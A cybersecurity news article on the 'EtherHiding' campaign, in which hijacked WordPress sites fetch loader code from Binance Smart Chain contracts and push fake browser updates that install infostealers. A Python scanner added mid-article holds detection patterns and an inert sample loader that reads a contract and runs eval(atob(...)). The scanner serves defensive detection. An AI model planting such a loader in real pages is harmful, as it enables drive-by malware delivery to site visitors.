New ‘EtherHiding’ Malware Campaign Compromised Binance’s Smart Chain
Threat actors have been observed using Binance Smart Chain (BSC) contracts to distribute malicious code, in what has been characterized as an advanced form of bulletproof hosting.
The campaign, first identified approximately two months ago, has been given the codename “EtherHiding” by Guardio Labs.
The new twist is the latest development in an ongoing campaign that abuses compromised WordPress websites to present deceptive notifications to unsuspecting visitors, urging them to update their web browsers before they can access the site. The fake update ultimately delivers information-stealing malware such as Amadey, Lumma, or RedLine.
According to security researchers Nati Tal and Oleg Zaytsev, the perpetrators swiftly adapted after their initial approach, which relied on compromised Cloudflare Worker hosts, was shut down. They shifted to the decentralized, anonymous, and publicly accessible properties of blockchain technology instead.
“This campaign has become increasingly challenging to identify and dismantle.”
Threat actors targeting WordPress sites through malicious plugins, and through exploitation of publicly disclosed vulnerabilities in widely used plugins, is a predictable pattern. A successful compromise gives them full control over the affected website.
The code injected into the compromised site retrieves a second-stage script, which in turn fetches a third-stage payload from a command-and-control (C2) server. That payload is what displays the fraudulent browser update notifications.
If a victim clicks the update button shown on the deceptive overlay, they are routed to a download page hosting a malicious executable, typically on Dropbox or another reputable file hosting service.
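The injected loader described above has a recognisable shape on the compromised page: an inline script that loads a web3 client, reads data back from a BSC contract, and executes whatever it receives. The following scanner, added here as an example and not code from the article or from Guardio Labs, flags inline scripts that combine those traits. The indicator names, the RPC host pattern, and the sample page are assumptions constructed for illustration; the embedded "injected" script is an inert stand-in with a dead contract address.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns for inline scripts on a WordPress page. The RPC host
# pattern and library names are assumptions about the loader's shape, not
# values taken from the article.
INDICATORS = {
    "web3_library": re.compile(r"\b(Web3|ethers)\b"),
    "bsc_rpc_endpoint": re.compile(r"bsc-dataseed\d*\.(binance|bnbchain)\.org", re.I),
    "contract_read": re.compile(r"\b(eth_call|eth_getCode|getStorageAt)\b|\.methods\.\w+\("),
    "dynamic_exec": re.compile(r"\b(eval|Function|document\.write)\s*\(|\.innerHTML\s*="),
    "decoding": re.compile(r"\b(atob|unescape|fromCharCode)\s*\("),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

# Constructed sample page: one legitimate script tag and one inert stand-in
# for an injected loader (placeholder ABI and a dead contract address).
SAMPLE_PAGE = """
<script src="/wp-includes/js/jquery.js"></script>
<script>
  var w = new Web3("https://bsc-dataseed1.binance.org/");
  var c = new w.eth.Contract(ABI, "0x000000000000000000000000000000000000dEaD");
  c.methods.get().call().then(function (r) { eval(atob(r)); });
</script>
"""


@dataclass
class Finding:
    index: int                 # position of the <script> tag on the page
    matched: list = field(default_factory=list)


def scan_html(html: str) -> list[Finding]:
    """Return one Finding per <script> tag with the indicators its body matched."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        body = m.group(1)
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        findings.append(Finding(index=i, matched=hits))
    return findings


def is_suspicious(f: Finding) -> bool:
    # Alert when a script both talks to a BSC RPC endpoint and executes what
    # comes back, or when several indicators stack up in one script body.
    chain_exec = {"bsc_rpc_endpoint", "dynamic_exec"} <= set(f.matched)
    return chain_exec or len(f.matched) >= 3


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f.index, "SUSPICIOUS" if is_suspicious(f) else "ok", f.matched)
```

Run it over the HTML served by a site rather than the files on disk, since an injected loader may be added at render time by a malicious plugin.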
The address and contract in question have been identified as being used in a phishing scheme. However, because the hosting is decentralized, there is currently no practical way to intervene and halt the attack.
According to the researchers, visitors to hijacked WordPress sites are unaware of what is happening behind the scenes, because the address in question is not used for any financial or other transaction that might deceive victims into handing over money or intellectual property.
The contract, even after being flagged as fake, malicious, or similar, remains reachable on the internet and continues to carry out its malicious function.
Given that WordPress plugins are an increasingly attractive target, users who depend on the content management system (CMS) should follow security best practices: apply the latest patches promptly, remove unnecessary administrative users, and enforce robust password policies.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he’s also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the field of content in an unusual way. He began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He also combines this interest with a love of narrative, which makes him a good writer in the cybersecurity field. In the bottom line, he frequently writes for Craw Security.